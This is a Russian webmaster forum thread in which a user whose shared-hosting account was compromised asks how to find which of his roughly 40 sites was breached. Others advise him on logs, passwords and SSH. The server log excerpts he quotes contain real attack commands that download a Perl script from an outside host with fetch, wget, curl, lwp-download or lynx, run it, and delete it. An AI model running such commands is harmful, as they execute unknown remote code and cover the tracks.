- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Собсно сабж. Ситуация - на акке около 40 сайтов, один сломали, я собсно даже знаю какой. Меня уверяют, что определить не могут с какого именно сайта идут атаки и в связи с этим заблочили весь акк - такое вообще возможно, что определить по логам нельзя откуда именно атака?
такое вообще возможно, что определить по логам нельзя откуда именно атака?
Вообще атака атаке рознь, но логи на то и логи, чтобы по ним определять.
Странно.., а что в трактовке хостера вообще значит «не может определить»? Если но логам не может, то пусть определяет тогда по чему-нибудь другому )) Вы же, надо думать, деньги платите им...
да вон дали какое-то:
/tmp;fetch http://notonyourradio.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt
srv8005 66344 0.4 0.0 5136 1500 ?? SJ 12:58PM 0:00.05 /bin/sh -c cd
/tmp;fetch http://notonyourradio.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt
srv8005 66345 0.0 0.0 7256 1860 ?? SJ 12:58PM 0:00.01 fetch
http://notonyourradio.com/21.txt
srv8005 66346 0.0 0.0 7256 1860 ?? SJ 12:58PM 0:00.01 fetch
http://notonyourradio.com/21.txt
по адресам ходить не советую.
аккаунта, и это делаете либо Вы, либо через Ваши сайты.
Тут действительно, атака идет не с сайта а с аккаунта. А разбираться, какой сайт ломанули - дело Ваше.
А разбираться, какой сайт ломанули - дело Ваше.
Т.е. в такой трактовке в хостеру нельзя что ли обратиться с вопросом: «Вы можете помочь установить, какой сайт сломали?» Мне, почему-то, очень сильно кажется, что можно обратиться. ))
посоветуйте чтоли что тогда делать-то вообще? я знаю какой ломанули. но что там именно сломали и как я докажу что именно оттуда атака идет? я в этих долбанных логах вообще ничего не понимаю.
ну или может кто помочь может? ессно за деньги.
Как мне представляется, зависит от конфигурации хостера, - для большинства случаев, я склонен согласиться с Борисом (т.е. говорить о взломе аккаунта); откуда/как взломали - не знаю
вот если бы речь шла об аккаунте, организованным с достаточно "полноценными" сайтами типа 1gb или Зенона (по терминологии последнего "дополнительный web-сервер"), тогда, полагаю, взломанный сайт был бы, в определенном смысле, сам по себе - но при такой организации аккаунта обычно держать на нем 40 действительно независимых сайтов дорого обходится, так что врядли речь идет о подобном варианте
basterr, Ваш хостер вам дал ssh ?
ну я хз как там у хт-сустемса организовано.
kxk, ssh должен быть.
kod_ssilki_ru, Судя по логам (они странноватые) чудеса творят на уровне ssh с логином тс. Тут надо просить логи доступа с Ипшниками, правдо на 99,99% будет какойнибудь прокси из страны которая игнорирует любые абузы ((( Во первых я бы сменил все пароли + попросил бы хостера временно выключить все сайты и убить все запущенные от имени тс процессы, потом запускать по одному и смотреть ху есть кто.
kxk добавил 23.07.2008 в 15:42
basterr, Попросите ssh для вас отключить ибо вы я так понимаю в нём "не взуб ногой" если слабо разбираетесь в логах, остальное я отписал выше.
хех. сайты как раз и вырубили. пароли только что поменял.
потом запускать по одному и смотреть ху есть кто
как я смотреть-то буду, если я вообще во всем этом "не в зуб ногой"?
вообще до этого мне давали такие логи:
/tmp;wget http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;curl -O http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lwp-download http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lynx -source http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
по ссылкам тоже ходить не советую. и вырубали один сайт. я думал поправил, отписал им. нифига оказывается не поправил и сегодня выключили все.